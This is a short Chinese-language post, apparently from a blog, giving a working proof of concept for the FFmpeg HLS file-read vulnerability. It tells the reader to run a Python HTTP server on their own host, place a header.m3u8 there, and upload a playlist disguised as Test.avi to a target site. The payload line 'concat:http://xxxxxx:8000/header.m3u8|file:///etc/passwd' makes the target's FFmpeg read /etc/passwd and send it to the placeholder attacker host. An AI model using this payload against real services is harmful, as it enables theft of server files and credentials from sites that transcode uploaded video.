FFmpeg文件读取漏洞测试

用python监听一个http端口:python -m SimpleHTTPServer
然后在网站根目录下面上传一个文件
header.m3u8
内容为
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://xxxxxx:8000? //网站url

之后在目标站上传
Test.avi
内容为
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://xxxxxx:8000/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

test.rar

标签: none

添加新评论